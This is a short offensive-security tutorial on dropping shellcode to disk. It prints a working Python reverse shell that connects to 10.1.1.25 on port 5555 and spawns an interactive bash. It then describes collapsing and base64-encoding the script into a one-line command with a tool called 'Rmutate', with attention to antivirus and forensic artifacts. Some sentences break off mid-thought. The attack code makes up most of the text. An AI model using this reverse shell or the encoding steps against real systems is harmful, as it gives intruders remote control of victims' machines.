In most cases this method of shellcode delivery should not be used, because writing the payload straight to memory ("Write to Mem") is superior to writing it to disk ("Write to HDD"): a file on disk leaves an artifact for forensics and AV to find. It is still worth knowing for the cases where you have to drop a file.
Let's take the following reverse shell written in Python, an interpreter that every OS X box and almost every Linux box has installed.
#!/usr/bin/env python
# GNUv3 (Scourge)
# Python Reverse Shell with PWD feedback
# Based off of the pentestmonkey version
import socket,pty,os; # import pty, not subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.1.1.25",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
x=pty.spawn("/bin/bash") # pty in place of subprocess
Next we remove the comments and the unneeded newlines and spaces, so the script collapses to a single line that can be base64-encoded and pasted into one shell command.
For help with the file-to-base64 formatting, use
Rmutate -h -f6
Above, you could either add the "-x
or you could redirect the output to a file like
Rmutate r > shell.py
since Rmutate always updates your clipboard anyway.
Rmutate -fx ./shell.py -osx "/usr/bin/env python /tmp/r.py" -df ./test rev -ex